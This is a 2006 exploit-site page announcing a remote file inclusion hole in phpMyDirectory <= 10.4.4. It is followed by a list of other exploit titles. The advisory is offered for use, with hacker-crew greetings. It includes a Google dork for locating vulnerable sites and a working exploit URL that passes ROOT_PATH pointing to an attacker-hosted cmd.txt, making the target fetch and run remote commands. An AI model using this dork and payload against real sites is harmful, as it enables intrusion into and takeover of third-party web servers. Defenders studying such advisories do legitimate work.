exploits , vulnerabilities , articles , phpMyDirectory <= 10.4.4 (ROOT

2006-05-19

phpMyDirectory <= 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability

Rated as : High Risk

Title       : phpMyDirectory <= 10.4.4 Remote File Inclusion
Vulnerability
-
URL         : http://www.phpmydirectory.com/
-
Dork        : "powered by phpmydirectory" or
intext:"2001-2006 phpMyDirectory.com"
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all
#papmahackerlink crew
-
Exploit     :
http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls
securitydot.net - 2006-05-19

Exploits - newest 10 RSS | More

2007-06-15 57247 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34173 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42389 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29318 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19758 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16697 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19392 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16579 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33596 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17217 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit

exploits , vulnerabilities , articles , phpMyDirectory <= 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability